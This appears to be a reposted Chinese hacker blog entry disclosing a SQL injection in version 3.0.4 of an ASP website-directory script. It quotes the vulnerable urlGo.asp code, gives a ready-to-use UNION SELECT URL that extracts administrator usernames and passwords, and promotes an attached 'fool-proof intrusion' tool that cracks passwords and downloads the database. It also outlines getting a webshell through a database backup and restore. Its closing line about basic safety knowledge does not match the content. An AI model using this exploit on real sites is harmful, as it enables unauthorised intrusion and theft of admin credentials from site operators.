深度學習(asp)網址導航v3.0.4 0day
發表時間:2023-04-20 來源:明輝站整理相關軟件相關文章人氣:
[摘要]んㄗ葑訫鎖愛'S Blog http://www.virusest.com/ 深度學習(asp)網址導航 v3.0.4 存在Sql注入漏洞 問題代碼urlGo.asp: <!...
んㄗ葑訫鎖愛'S Blog http://www.virusest.com/
深度學習(asp)網址導航 v3.0.4 存在Sql注入漏洞
問題代碼urlGo.asp:
<!--#include file="connDB.asp"-->
<!--#include file="include/Function.Common.asp"-->
<%
id=request.QueryString("id")
if id="" then
response.Redirect("/")
end if
'-----網址--------------
Set rsWebUrl=Server.CreateObject("Adodb.Recordset")
sqlC="select * from tWebUrl where fpassed=1 and fid=" & id
rsWebUrl.open sQLC,conn,0,1
if rsWebUrl.Eof and rsWebUrl.Bof then
response.Redirect("/")
else
%>
很明顯,可以注入,而且頭文件由于程序員疏忽,很配合的沒調用防注入系統.其他文件均調用防注入.
利用:注意注入點用明小子或者啊D檢測不出來,簡單寫下注入語句:
http://localhost/urlGo.asp?id=4233%20and%201=2%20union%20select%201,2,fusername,4,5,6,7,8,9,10%20from%20tAdmin
查密碼只需把fusername改成fpassword,但是在測試的時候,發現因版本不同,可能表段長度不同,如果提示列數不匹配,則換成9個即可.
這里我寫了利用工具,傻瓜式入侵,其中,ID值為在搜索引擎中看到的ID,如圖:
工具集成了暴密碼賬號,后臺訪問,數據庫下載MD5破解等功能,工具和源碼見附件.
未加殼,歡迎篡改版權!好久沒寫程序了,就當練手吧!
Ps:后臺拿Shell比較費勁,提示空殼數據庫,先恢復在備份,再一句話!
上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。